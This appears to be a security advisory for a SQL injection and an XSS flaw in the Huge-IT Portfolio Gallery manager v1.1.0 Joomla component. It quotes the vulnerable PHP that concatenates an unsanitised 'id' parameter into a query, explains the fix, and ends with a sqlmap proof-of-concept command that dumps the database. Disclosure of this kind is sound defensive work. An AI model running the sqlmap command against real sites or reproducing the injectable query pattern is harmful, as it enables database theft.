Title: Huge-IT Portfolio Gallery manager v1.1.0 SQL Injection and XSS

The attacker must be logged in with at least manager-level access, or have access to the administrative panel, to exploit these vulnerabilities.

XSS, line 156 in ./administrator/components/com_portfoliogallery/views/video/tmpl/default.php:

155 [the quoted template line is not preserved on this page]

SQL injection, in file administrator/components/com_portfoliogallery/models/portfoliogallery.php: the request variable id is passed without any sanitization to the SQL query that is built starting at line 53:

50 public function getPropertie() {
51     $db = JFactory::getDBO();
52     $id_cat = JRequest::getVar('id');
53     $query = $db->getQuery(true);
54     $query->select('#__huge_itportfolio_images.name as name,'
55         . '#__huge_itportfolio_images.id ,'
56         . '#__huge_itportfolio_portfolios.name as portName,'
57         . 'portfolio_id,#__huge_itportfolio_images.category as category, #__huge_itportfolio_images.description as description,image_url,sl_url, sl_type,link_target,#__huge_itportfolio_images.ordering,#__huge_itportfolio_images.published,published_in_sl_width');
58     $query->from(array('#__huge_itportfolio_portfolios' => '#__huge_itportfolio_portfolios', '#__huge_itportfolio_images' => '#__huge_itportfolio_images'));
59     $query->where('#__huge_itportfolio_portfolios.id = portfolio_id')->where('portfolio_id=' . $id_cat);
60     $query->order('ordering asc');
61     $db->setQuery($query);
62     $results = $db->loadObjectList();
63     return $results;

The root cause is on line 59: $id_cat, read on line 52 with JRequest::getVar('id'), is concatenated into the WHERE clause unquoted and unvalidated. Reading the parameter as an integer (for example JRequest::getInt('id'), or an (int) cast before it is used) ensures that only a numeric portfolio id can reach the query.

Proof of concept:

sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_portfoliogallery&view=portfoliogallery&id=*" --dbms mysql --dump